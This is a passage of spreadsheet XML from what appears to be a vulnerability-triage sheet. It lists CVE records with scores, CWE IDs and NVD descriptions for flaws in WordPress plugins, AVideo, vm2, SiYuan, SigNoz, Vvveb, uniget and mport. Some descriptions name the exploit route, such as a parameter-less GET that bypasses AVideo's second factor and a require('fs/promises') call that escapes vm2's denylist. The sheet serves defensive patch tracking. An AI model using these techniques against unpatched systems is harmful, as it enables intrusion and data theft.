          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68791</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87963</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr"/>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>The Yo WordPress plugin from 1.1 through 1.3.1 does not sanitize or parameterize the username request parameter before using it in a SQL query, and reads it before WordPress applies its request escaping, allowing unauthenticated attackers to perform SQL injection and read arbitrary database contents including administrator password hashes.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87963</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92914</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>AVideo LoginControl contains an authentication bypass vulnerability in the PGP second factor verification that compares challenge responses using loose equality against an uninitialized session variable. Attackers with a victim's password can bypass the second factor by sending a parameter-less GET request to verifyChallenge.json.php, which evaluates null == null and marks authentication complete.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92914</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92954</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox library for running untrusted JavaScript in Node.js. In versions &gt;= 3.10.0 and &lt;= 3.11.7, Promises returned from the host realm into the sandbox are not marked as handled at the bridge boundary; only Promises created inside the sandbox are wrapped with a rejection-swallowing handler (lib/setup-sandbox.js), and the bridge only installs host-side rejection sanitizers when sandbox code calls .then/.catch/.finally. As a result, code running in the sandbox can invoke a host function that returns a rejected Promise (for example events.once() exposed via the NodeVM events builtin, or any embedder-provided Promise-returning API) and simply ignore the return value, leaving the host Promise unhandled so that Node.js's default unhandled-rejection behavior terminates the host process. This is an incomplete fix of GHSA-hw58-p9xv-2mjh. The issue is fixed in version 3.11.8.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92954</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92985</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.6</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2026-09-17</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before 3.8.4 fail to escape bookmark labels imported from notebook files when rendering them in the dock tree. Attackers can craft malicious .sy notebook files with unescaped HTML in bookmark attributes that execute scripts in the Electron renderer with access to child_process for command execution.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92985</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92986</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.4 renders document titles as HTML in the backlink dock tree without escaping markup characters. Attackers can set malicious titles through the rename API or crafted notebooks to execute scripts in the Electron renderer with access to child_process for command execution.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92986</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66580</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Product Feed Manager &lt;= 7.12.0 versions.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66580</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71538</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr">
        <is>
          <t>npm:@cyclonedx/cyclonedx-npm</t>
        </is>
      </c>
      <c r="M108" s="5" t="inlineStr">
        <is>
          <t>6.0.0</t>
        </is>
      </c>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>@cyclonedx/cyclonedx-npm creates CycloneDX Software Bill of Materials from npm projects. Prior to version 6.0.0, the Windows fallback path in src/npmRunner.ts, used when npm_execpath does not provide the npm CLI path, can construct a shell command containing an untrusted value from the --workspace option. When an attacker can influence that option and the fallback npm execution path is reached, shell metacharacters in the workspace value can execute arbitrary operating-system commands with the privileges of the user running the CLI, allowing data access, file modification, or service disruption. This issue is fixed in version 6.0.0.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71538</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92958</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>vm2 through 3.11.6 contains a builtin-module denylist bypass in NodeVM. When the embedder uses the builtin wildcard together with negative entries (e.g. require: { builtin: ['*', '-fs', '-child_process'] }), negative entries are matched by exact module name in lib/builtin.js, so -fs removes only the builtin named fs and does not remove builtin subpaths such as fs/promises. Sandboxed code can therefore call require('fs/promises') or require('node:fs/promises') and reach the promise-based filesystem API despite fs being denied; node: prefix handling is likewise inconsistent (a -node:fs/promises entry does not block require('fs/promises')). Host file creation and writing were confirmed via fsp.writeFile(), and other fs/promises operations (cp, mkdir, rename, rm, rmdir, truncate, read operations, etc.) are also reachable. This issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92958</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93292</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>SigNoz versions from 0.88.0 before 0.142.1 contain a SQL injection vulnerability in trace-funnel analytics endpoints that interpolate service_name and span_name fields into ClickHouse string literals without escaping. Authenticated attackers can inject SQL through funnel step definitions to execute arbitrary queries and read results in HTTP responses.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93292</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93426</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>SigNoz versions 0.87.0 before 0.142.0 fail to escape user-supplied telemetry field-key names in the v5 query_range API, allowing authenticated users to inject SQL. Attackers with Viewer role or higher can embed backticks and quotes in field names to break out of identifiers and string literals, executing arbitrary ClickHouse SQL to read system tables and exfiltrate data.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93426</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54507</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.5, the oEmbedProxy() handler in admin/controller/editor/editor.php accepts an attacker-controlled url parameter and passes it to getUrl(), while validateUrl() in system/functions.php checks only the hostname string and does not validate its resolved addresses. An authenticated admin-panel user with editor/* permission can invoke GET /admin/index.php?module=editor/editor&amp;action=oEmbedProxy with a dotted hostname or normalized loopback form that resolves to a private, loopback, link-local, or reserved address, causing the server to issue an HTTP or HTTPS request and return the response body. Storefront users and anonymous visitors cannot invoke the endpoint, but no CSRF token is required because the action uses GET. This can disclose internal service responses or cloud instance metadata and associated credentials. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54507</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55062</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23, CWE-36, CWE-73</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>uniget is a universal installer and updater for (container) tools. Prior to 0.27.6, the hooks edit command in cmd/uniget/hooks.go concatenates an unvalidated hook filename with the selected hooks directory, allowing parent-directory components to escape that directory. The resulting path is passed to the configured editor, which can access or modify files outside the hooks directory with the privileges of the uniget process account. This issue is fixed in version 0.27.6.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55062</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54580</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-354, CWE-755</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, libmport/util.c did not make every truncated, corrupt, or failed zstd stream fatal in mport_decompress_zstd(), and libmport/fetch.c did not consistently propagate those failures to index-fetch callers. A malicious or faulty mirror could supply compressed package index data that caused ZSTD_decompressStream() or an output write to fail while leaving partial index output available for later use, resulting in package-index integrity loss or denial of service. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54580</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54581</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, the mport_fetch_bootstrap_index() function in libmport/fetch.c could return success when bootstrap index hash verification encountered a missing or invalid hash because the failure path did not preserve a fatal result. A network attacker or compromised mirror able to alter bootstrap index content or its transport path could therefore cause mport to proceed with an unverified or tampered bootstrap package index. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54581</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54583</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, libmport/fetch.c did not consistently reject empty, dot, dot-dot, or slash-containing bundle filenames before composing package download and write paths. Malicious package index data could place an unsafe value in indexEntry-&gt;bundlefile, and the missing is_valid_bundle_filename() checks allowed downloaded package data to be written outside the intended cache location or to an unsafe destination name. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54583</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54597</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
